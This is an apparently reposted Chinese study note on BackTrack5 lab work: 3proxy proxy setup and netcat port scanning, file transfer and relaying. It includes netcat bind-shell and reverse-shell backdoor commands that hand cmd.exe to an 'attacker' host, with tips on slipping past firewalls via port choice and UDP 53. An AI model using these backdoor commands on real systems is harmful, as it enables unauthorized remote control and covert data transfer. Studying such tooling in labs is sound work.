BackTrack5 学习笔记四

来源:互联网 发布:对锐捷网络的了解 编辑:程序博客网 时间:2024/05/18 01:36

proxy代理技术

查看3proxy配置文件

代理主机IP192.168.8.159  web服务器IP192.168.8.167

root@bt:~# vi /pentest/backdoors/3proxy/cfg/3proxy.cfg

External(在局域网内外部接口这里用不到)internal(改成web服务器的IP,前提是你要在web服务器主机上(不是自己)配置好自己的web服务器,详见http://www.jb51.net/os/Ubuntu/43308.html)

然后启动3proxy:

root@bt:/pentest/backdoors/3proxy# ./3proxy cfg/3proxy.cfg

现在可以在其他主机上访问http://192.168.8.159/info.php他会自动转到http://192.168.8.167/info.php 和直接访问http://192.168.8.167/info.php的效果一样

注意http://192.168.8.159/info.php实际上不存在

Netcat

网络的瑞士军刀,功能强大,做后门的效果比较好

1.扫描主机端口是否开放

root@bt:~# nc -v -n -z 192.168.8.159 1-1024

连接到21端口开放的主机

root@bt:~# nc 192.168.8.159 21

2.做后门

  2.1 受害者做服务器,当攻击者连接受害者的时候,受害者把自己的cmd.exe给攻击者,这种方法因为是攻击者连接受害者可能会遇到防火墙的封杀。

   在WIN7下用nc做服务器的命令:C:\Users\xyw\Desktop>nc.exe -d -L -p 3333 -e cmd.exe (注意:我在网上下的一个nc.exe,放在桌面上,端口是3333)

   然后再BT5下连接WIN7ip3333端口:root@bt:~# nc 192.168.8.151 3333,得到WIN7cmd.exe控制权。

2.2 攻击者做服务器,等待受害者来连接,可以有效避免防火墙的拦截。

BT5做服务器:root@bt:~# nc -L -p 3333

WIN7做客户端:nc.exe –d 192.168.8.167 3333 –e cmd.exe

2.3 用来传文件

  现在BT5下面root@bt:~# nc -l -u -p 53 > test.py,用udp 53(dns协议用的端口)端口来传文件可以防止防火墙封杀,把收到的文件命名为test.py(随便命名)

WIN7下:C:\Users\xyw\Desktop>nc.exe -u 192.168.8.167 53 < npu.py

(192.168.8.167 BT5 IP192.168.8.151 WIN7 IP)

2.nc做中继站,和代理服务器差不多,当你连接中继的时候转到指定的IPnc可以抓包

查看和修改配置文件root@bt:~# vi telnet_relay ( 主要修改IP,要跳到的IP)

启动:root@bt:~# nc -l -p 80 -e telnet_relay

然后其他主机:telnet IP(中继站IP)时跳转到指定IP

原创粉丝点击